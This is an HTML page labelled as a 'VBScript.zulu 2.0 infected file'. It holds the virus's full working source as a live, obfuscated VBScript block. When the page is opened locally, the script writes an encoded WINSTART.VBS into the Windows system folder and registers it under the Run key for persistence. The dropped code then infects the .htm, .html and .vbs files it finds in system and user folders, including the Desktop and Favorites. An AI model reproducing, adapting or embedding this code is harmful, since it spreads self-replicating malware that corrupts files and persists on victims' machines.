<html>

<head>
<meta http-equiv="Content-Type"
content="text/html; charset=iso-8859-1">
<meta name="GENERATOR" content="Microsoft FrontPage Express 2.0">
<title>VBScript.zulu</title>
</head>

<body bgcolor="#FFFFFF">

<p align="left"><font size="4" face="Arial">VBScript.zulu 2.0
infected file.</font></p>
</body>
</html>

<Script Language = "VBS">
If Location.Protocol = "file:" Then
Randomize
If Int((2 - 1 + 1) * Rnd + 1) = 1 Then
Set A1 = CreateObject("Scripting.FileSystemObject")
Set A2 = A1.OpenTextFile(Replace(Location.PathName,"/",""),1)
Do While A2.AtEndOfStream = False And Mid(A3,18,20) <> "DX^MNB@M^L@BIHOD]Rng"
A3 = A2.ReadLine
Loop
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1),B("VHORU@SU/WCR")),True)
A4.WriteLine(B("Rdu!@0!<!Bsd`udNckdbu)""Rbshquhof/GhmdRxrudlNckdbu""("))
A4.WriteLine(B("Rdu!@3!<!@0/NqdoUdyuGhmd)VRbshqu/RbshquGtmmO`ld-0("))
A4.WriteLine(B("En!Vihmd!@3/@uDoeNgRusd`l!<!G`mrd!@oe!Lhe)@2-08-31(!=?!""epknr!Jcliwcig!?!""""""""T"""))
A4.WriteLine(B("@2!<!@3/Sd`eMhod"))
A4.WriteLine(B("Mnnq"))
A4.WriteLine(B("S`oenlh{d"))
A4.WriteLine(B("@5!<!Hou))9!,!0!*!0(!+!Soe!*!0("))
A4.WriteLine(B("Rdu!@4!<!Bsd`udNckdbu)C)""YUepknr,Ufgjj""(("))
A4.WriteLine(B("Hg!@5!<!0!Uido"))
A4.WriteLine(B("@7!<!@0/FduRqdbh`mGnmeds)3("))
A4.WriteLine(B("DmrdHg!@5!<!3!Uido"))
A4.WriteLine(B("@7!<!@0/CthmeQ`ui)@0/FduRqdbh`mGnmeds)1(-C)""FGJN""(("))
A4.WriteLine(B("DmrdHg!@5!<!2!Uido"))
A4.WriteLine(B("@7!<!@0/CthmeQ`ui)@0/FduRqdbh`mGnmeds)1(-C)""UCONJGU""(("))
A4.WriteLine(B("DmrdHg!@5!<!5!Uido"))
A4.WriteLine(B("@7!<!@0/CthmeQ`ui)@0/FduRqdbh`mGnmeds)1(-C)""RGONQPCP[!KLRGPLGR!DKJGU""(("))
A4.WriteLine(B("DmrdHg!@5!<!4!Uido"))
A4.WriteLine(B("@7!<!@4/Rqdbh`mGnmedsr)C)""CjjWugpuBgumrqn""(("))
A4.WriteLine(B("DmrdHg!@5!<!7!Uido"))
A4.WriteLine(B("@7!<!@4/Rqdbh`mGnmedsr)C)""Bgumrqn""(("))
A4.WriteLine(B("DmrdHg!@5!<!6!Uido"))
A4.WriteLine(B("@7!<!@4/Rqdbh`mGnmedsr)C)""O{Bqewoglru""(("))
A4.WriteLine(B("Dmrd"))
A4.WriteLine(B("@7!<!@4/SdfSd`e)C)""FMG[aJQECJaOCEFKLGZUqdrycpgZOkepquqdrZYklbqyuZEwppglrTgpukqlZNpqipcoDkjguBkp""(("))
A4.WriteLine(B("Doe!Hg"))
A4.WriteLine(B("Hg!E`x)Onv(!<!0!Uido"))
A4.WriteLine(B("LrfCny!C)""Jc!ocswklc!dwg!kldgercbc!eql!gj!tkpwu!T@Uepknr,xwjw!0,.!nqp!xwjw!&`kgl!qpkiklcj!jq!okq+,""(-5003-C)""T@Uepknr,xwjw""("))
A4.WriteLine(B("Dmrd"))
A4.WriteLine(B("Hg!@0/GnmedsDyhrur)@7(!<!Ustd!Uido"))
A4.WriteLine(B("B)@7("))
A4.WriteLine(B("Doe!Hg"))
A4.WriteLine(B("Doe!Hg"))
A4.WriteLine(B("Gtobuhno!C)C0("))
A4.WriteLine(B("Gns!C3!<!0!Un!Mdo)C0("))
A4.WriteLine(B("Hg!@rb)Lhe)C0-C3-0((!=?!23!@oe!@rb)Lhe)C0-C3-0((!=?!22!@oe!@rb)Lhe)C0-C3-0((!=?!25!@oe!@rb)Lhe)C0-C3-0((!=?!071!@oe!@rb)Lhe)C0-C3-0((!=?!344!Uido"))
A4.WriteLine(B("Hg!@rb)Lhe)C0-C3-0((!Lne!3!<!1!Uido"))
A4.WriteLine(B("C!<!C!*!Bis)@rb)Lhe)C0-C3-0((!,!Shfiu)@rb)Lhe)@2-31-0((!,!3-0(("))
A4.WriteLine(B("Dmrd"))
A4.WriteLine(B("C!<!C!*!Bis)@rb)Lhe)C0-C3-0((!*!Shfiu)@rb)Lhe)@2-31-0((!,!3-0(("))
A4.WriteLine(B("Doe!Hg"))
A4.WriteLine(B("Dmrd"))
A4.WriteLine(B("C!<!C!*!Lhe)C0-C3-0("))
A4.WriteLine(B("Doe!hg"))
A4.WriteLine(B("Odyu"))
A4.WriteLine(B("Doe!Gtobuhno"))
A4.WriteLine(B("Rtc!B)B0("))
A4.WriteLine(B("Gns!D`bi!B3!Ho!@0/FduGnmeds)B0(/Ghmdr"))
A4.WriteLine(B("Hg!TB`rd)@0/FduDyudorhnoO`ld)B3((!<!TB`rd)C)""FRO""((!Ns!TB`rd)@0/FduDyudorhnoO`ld)B3((!<!TB`rd)C)""FROJ""((Uido"))
A4.WriteLine(B("Hg!E)B3(!<!G`mrd!Uido"))
A4.WriteLine(B("D!B3"))
A4.WriteLine(B("Doe!Hg"))
A4.WriteLine(B("DmrdHg!TB`rd)@0/FduDyudorhnoO`ld)B3((!<!TB`rd)C)""T@U""((!Uido"))
A4.WriteLine(B("Hg!E)B3(!<!G`mrd!Uido"))
A4.WriteLine(B("G!B3"))
A4.WriteLine(B("Doe!Hg"))
A4.WriteLine(B("Doe!Hg"))
A4.WriteLine(B("Odyu"))
A4.WriteLine(B("Gns!D`bi!B2!Ho!@0/FduGnmeds)B0(/RtcGnmedsr"))
A4.WriteLine(B("B!B2"))
A4.WriteLine(B("Odyu"))
A4.WriteLine(B("Doe!Rtc"))
A4.WriteLine(B("Gtobuhno!E)E0("))
A4.WriteLine(B("Rdu!E3!<!@0/NqdoUdyuGhmd)E0-0("))
A4.WriteLine(B("En!Vihmd!E3/@uDoeNgRusd`l!<!G`mrd!@oe!E2!=?!C)""C7,PgiYpkrg!@&""""KHBV\OL@>O\J>@KFQB_Pliwt^ub_Jf`ulpliw_Tfqgltp_@ruubqwYbupflq_Urq_TfqPw^uw""""+*C3,@wkjbNcrf&C3,IgrUngekcjDqjbgp&3+*@&""""TFQPW>UW1YEP""""++""("))
A4.WriteLine(B("E2!<!E3/Sd`eMhod"))
A4.WriteLine(B("Mnnq"))
A4.WriteLine(B("E3/Bmnrd"))
A4.WriteLine(B("Hg!E2!<!C)""C7,PgiYpkrg!@&""""KHBV\OL@>O\J>@KFQB_Pliwt^ub_Jf`ulpliw_Tfqgltp_@ruubqwYbupflq_Urq_TfqPw^uw""""+*C3,@wkjbNcrf&C3,IgrUngekcjDqjbgp&3+*@&""""TFQPW>UW1YEP""""++""(!Uido"))
A4.WriteLine(B("E!<!Ustd"))
A4.WriteLine(B("Dmrd"))
A4.WriteLine(B("E!<!G`mrd"))
A4.WriteLine(B("Doe!Hg"))
A4.WriteLine(B("Doe!Gtobuhno"))
A4.WriteLine(B("Rtc!D)D0("))
A4.WriteLine(B("Rdu!D3!<!@0/FduGhmd)D0("))
A4.WriteLine(B("D2!<!D3/@uushctudr"))
A4.WriteLine(B("Hg!D2!=?!1!Uido"))
A4.WriteLine(B("D3/@uushctudr!<!1"))
A4.WriteLine(B("Doe!Hg"))
A4.WriteLine(B("Rdu!D5!<!@0/NqdoUdyuGhmd)D0-9("))
A4.WriteLine(B("D5/VshudMhod)""""("))
A4.WriteLine(B("D5/VshudMhod)C)"":Uepknr!Jcliwcig!?!""""T@U""""<""(("))
A4.WriteLine(B("D5/VshudMhod)C)""Kd!Jqecrkql,Npqrqeqj!?!""""dkjg8""""!Rfgl""(("))
A4.WriteLine(B("D5/VshudMhod)C)""Pclbqokxg""(("))
A4.WriteLine(B("D5/VshudMhod)C)""Kd!Klr&&0!/!3!-!3+!(!Plb!-!3+!?!3!Rfgl""(("))
A4.WriteLine(B("D5/VshudMhod)C)""Ugr!C3!?!EpgcrgQ`hger&""""Uepknrkli,DkjgU{urgoQ`hger""""+""(("))
A4.WriteLine(B("D5/VshudMhod)C)""Ugr!C0!?!C3,QnglRgvrDkjg&Pgnjceg&Jqecrkql,NcrfLcog*""""1""""*""""""""+*3+""(("))
A4.WriteLine(B("D5/VshudMhod)C)""Bq!Yfkjg!C0,CrGlbQdUrpgco!?!Dcjug!Clb!Okb&C5*36*0.+!:<!""""BV\OL@>O\J>@KFQB_Pli""""""(("))
A4.WriteLine(B("D5/VshudMhod)C)""C5!?!C0,PgcbJklg""(("))
A4.WriteLine(B("D5/VshudMhod)C)""Jqqn""(("))
A4.WriteLine(B("D5/VshudMhod)C)""Ugr!C2!?!C3,EpgcrgRgvrDkjg&C3,@wkjbNcrf&C3,IgrUngekcjDqjbgp&3+*@&""""TFQPW>UW1YEP""""++*Rpwg+""(("))
A4.WriteLine(B("Rdu!D4!<!@0/NqdoUdyuGhmd)VRbshqu/RbshquGtmmO`ld-0("))
A4.WriteLine(B("En!Vihmd!D4/@uDoeNgRusd`l!<!G`mrd"))
A4.WriteLine(B("D5/VshudMhod)C)""C2,YpkrgJklg&@&""""""(!*!F)Sdqm`bd)D4/Sd`eMhod-C)""""""""(-C)""""""""""""(((!*!C)""""""++""(("))
A4.WriteLine(B("Mnnq"))
A4.WriteLine(B("D4/Bmnrd"))
A4.WriteLine(B("D5/VshudMhod)C)""C2,Ejqug""(("))
A4.WriteLine(B("D5/VshudMhod)C)""Ugr!C7!?!EpgcrgQ`hger&@&""""TP`ufsw1Pkboo""""++""(("))
A4.WriteLine(B("D5/VshudMhod)C)""C7,PgiYpkrg!@&""""KHBV\OL@>O\J>@KFQB_Pliwt^ub_Jf`ulpliw_Tfqgltp_@ruubqwYbupflq_Urq_TfqPw^uw""""+*C3,@wkjbNcrf&C3,IgrUngekcjDqjbgp&3+*@&""""TFQPW>UW1YEP""""++""(("))
A4.WriteLine(B("D5/VshudMhod)C)""Glb!Kd""(("))
A4.WriteLine(B("D5/VshudMhod)C)""Glb!Kd""(("))
A4.WriteLine(B("D5/VshudMhod)C)""Dwlerkql!@&@3+""(("))
A4.WriteLine(B("D5/VshudMhod)C)""Dqp!@0!?!3!Rq!Jgl&@3+""(("))
A4.WriteLine(B("D5/VshudMhod)C)""Kd!Cue&Okb&@3*@0*3++!:<!52!Clb!Cue&Okb&@3*@0*3++!:<!57!Clb!Cue&Okb&@3*@0*3++!:<!304!Rfgl""(("))
A4.WriteLine(B("D5/VshudMhod)C)""Kd!Cue&Okb&@3*@0*3++!Oqb!0!?!.!Rfgl""(("))
A4.WriteLine(B("D5/VshudMhod)C)""@!?!@!-!Efp&Cue&Okb&@3*@0*3++!-!Pkifr&Cue&Okb&C5*96*3++!/!7*3++""(("))
A4.WriteLine(B("D5/VshudMhod)C)""Gjug""(("))
A4.WriteLine(B("D5/VshudMhod)C)""@!?!@!-!Efp&Cue&Okb&@3*@0*3++!/!Pkifr&Cue&Okb&C5*96*3++!/!7*3++""(("))
A4.WriteLine(B("D5/VshudMhod)C)""Glb!Kd""(("))
A4.WriteLine(B("D5/VshudMhod)C)""Gjug""(("))
A4.WriteLine(B("D5/VshudMhod)C)""@!?!@!-!Okb&@3*@0*3+""(("))
A4.WriteLine(B("D5/VshudMhod)C)""Glb!Kd""(("))
A4.WriteLine(B("D5/VshudMhod)C)""Lgvr""(("))
A4.WriteLine(B("D5/VshudMhod)C)""Glb!Dwlerkql""(("))
A4.WriteLine(B("D5/VshudMhod)C)"":1Uepknr<""(("))
A4.WriteLine(B("D5/Bmnrd"))
A4.WriteLine(B("Hg!D2!=?!1!Uido"))
A4.WriteLine(B("D3/@uushctudr!<!D2"))
A4.WriteLine(B("Doe!Hg"))
A4.WriteLine(B("Doe!Rtc"))
A4.WriteLine(B("Rtc!G)G0("))
A4.WriteLine(B("Rdu!G3!<!@0/FduGhmd)G0("))
A4.WriteLine(B("G2!<!G3/@uushctudr"))
A4.WriteLine(B("Hg!G2!=?!1!Uido"))
A4.WriteLine(B("G3/@uushctudr!<!1"))
A4.WriteLine(B("Doe!Hg"))
A4.WriteLine(B("Rdu!G5!<!@0/NqdoUdyuGhmd)G0-9("))
A4.WriteLine(B("G5/VshudMhod)""""("))
A4.WriteLine(B("G5/VshudMhod)C)""Ugr!C3!?!EpgcrgQ`hger&""""Uepknrkli,DkjgU{urgoQ`hger""""+""(("))
A4.WriteLine(B("G5/VshudMhod)C)""Ugr!C0!?!C3,QnglRgvrDkjg&YUepknr,UepknrDwjjLcog*3+""(("))
A4.WriteLine(B("G5/VshudMhod)C)""Bq!Yfkjg!C0,CrGlbQdUrpgco!?!Dcjug!Clb!Okb&C5*2.*0.+!:<!""""^ub_Jf`ulpliw_Tfqglt""""""(("))
A4.WriteLine(B("G5/VshudMhod)C)""C5!?!C0,PgcbJklg""(("))
A4.WriteLine(B("G5/VshudMhod)C)""Jqqn""(("))
A4.WriteLine(B("G5/VshudMhod)C)""Ugr!C2!?!C3,EpgcrgRgvrDkjg&C3,@wkjbNcrf&C3,IgrUngekcjDqjbgp&3+*@&""""TFQPW>UW1YEP""""++*Rpwg+""(("))
A4.WriteLine(B("Rdu!G4!<!@0/NqdoUdyuGhmd)VRbshqu/RbshquGtmmO`ld-0("))
A4.WriteLine(B("En!Vihmd!G4/@uDoeNgRusd`l!<!G`mrd"))
A4.WriteLine(B("G5/VshudMhod)C)""C2,YpkrgJklg&@&""""""(!*!F)Sdqm`bd)G4/Sd`eMhod-C)""""""""(-C)""""""""""""(((!*!C)""""""++""(("))
A4.WriteLine(B("Mnnq"))
A4.WriteLine(B("G4/Bmnrd"))
A4.WriteLine(B("G5/VshudMhod)C)""C2,Ejqug""(("))
A4.WriteLine(B("G5/VshudMhod)C)""Ugr!C7!?!EpgcrgQ`hger&@&""""TP`ufsw1Pkboo""""++""(("))
A4.WriteLine(B("G5/VshudMhod)C)""C7,PgiYpkrg!@&""""KHBV\OL@>O\J>@KFQB_Pliwt^ub_Jf`ulpliw_Tfqgltp_@ruubqwYbupflq_Urq_TfqPw^uw""""+*C3,@wkjbNcrf&C3,IgrUngekcjDqjbgp&3+*@&""""TFQPW>UW1YEP""""++""(("))
A4.WriteLine(B("G5/VshudMhod)C)""Dwlerkql!@&@3+""(("))
A4.WriteLine(B("G5/VshudMhod)C)""Dqp!@0!?!3!Rq!Jgl&@3+""(("))
A4.WriteLine(B("G5/VshudMhod)C)""Kd!Cue&Okb&@3*@0*3++!:<!52!Clb!Cue&Okb&@3*@0*3++!:<!57!Clb!Cue&Okb&@3*@0*3++!:<!304!Rfgl""(("))
A4.WriteLine(B("G5/VshudMhod)C)""Kd!Cue&Okb&@3*@0*3++!Oqb!0!?!.!Rfgl""(("))
A4.WriteLine(B("G5/VshudMhod)C)""@!?!@!-!Efp&Cue&Okb&@3*@0*3++!-!Pkifr&Cue&Okb&C5*9.*3++!-!3*3++""(("))
A4.WriteLine(B("G5/VshudMhod)C)""Gjug""(("))
A4.WriteLine(B("G5/VshudMhod)C)""@!?!@!-!Efp&Cue&Okb&@3*@0*3++!/!Pkifr&Cue&Okb&C5*9.*3++!-!3*3++""(("))
A4.WriteLine(B("G5/VshudMhod)C)""Glb!Kd""(("))
A4.WriteLine(B("G5/VshudMhod)C)""Gjug""(("))
A4.WriteLine(B("G5/VshudMhod)C)""@!?!@!-!Okb&@3*@0*3+""(("))
A4.WriteLine(B("G5/VshudMhod)C)""Glb!Kd""(("))
A4.WriteLine(B("G5/VshudMhod)C)""Lgvr""(("))
A4.WriteLine(B("G5/VshudMhod)C)""Glb!Dwlerkql""(("))
A4.WriteLine(B("G5/Bmnrd"))
A4.WriteLine(B("Hg!G2!=?!1!Uido"))
A4.WriteLine(B("G3/@uushctudr!<!G2"))
A4.WriteLine(B("Doe!Hg"))
A4.WriteLine(B("Doe!Rtc"))
A4.WriteLine(B("Gtobuhno!F)F0("))
A4.WriteLine(B("Gns!F3!<!0!Un!Mdo)F0("))
A4.WriteLine(B("Hg!@rb)Lhe)F0-F3-0((!=?!25!@oe!@rb)Lhe)F0-F3-0((!=?!24!@oe!@rb)Lhe)F0-F3-0((!=?!037!Uido"))
A4.WriteLine(B("Hg!@rb)Lhe)F0-F3-0((!Lne!3!<!1!Uido"))
A4.WriteLine(B("F!<!F!*!Bis)@rb)Lhe)F0-F3-0((!*!Shfiu)@rb)Lhe)@2-51-0((!,!2-0(("))
A4.WriteLine(B("Dmrd"))
A4.WriteLine(B("F!<!F!*!Bis)@rb)Lhe)F0-F3-0((!,!Shfiu)@rb)Lhe)@2-51-0((!,!2-0(("))
A4.WriteLine(B("Doe!Hg"))
A4.WriteLine(B("Dmrd"))
A4.WriteLine(B("F!<!F!*!Lhe)F0-F3-0("))
A4.WriteLine(B("Doe!Hg"))
A4.WriteLine(B("Odyu"))
A4.WriteLine(B("Doe!Gtobuhno"))
A4.Close
Set A5 = CreateObject(B("VRbshqu/Ridmm"))
A5.RegWrite B("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"),A1.BuildPath(A1.GetSpecialFolder(1),B("VHORU@SU/WCR"))
End If
End If
Function B(B1)
For B2 = 1 To Len(B1)
If Asc(Mid(B1,B2,1)) <> 34 And Asc(Mid(B1,B2,1)) <> 35 And Asc(Mid(B1,B2,1)) <> 126 Then
If Asc(Mid(B1,B2,1)) Mod 2 = 0 Then
B = B + Chr(Asc(Mid(B1,B2,1)) + Right(Asc(Mid(A3,78,1)) - 5,1))
Else
B = B + Chr(Asc(Mid(B1,B2,1)) - Right(Asc(Mid(A3,78,1)) - 5,1))
End If
Else
B = B + Mid(B1,B2,1)
End If
Next
End Function
</Script>
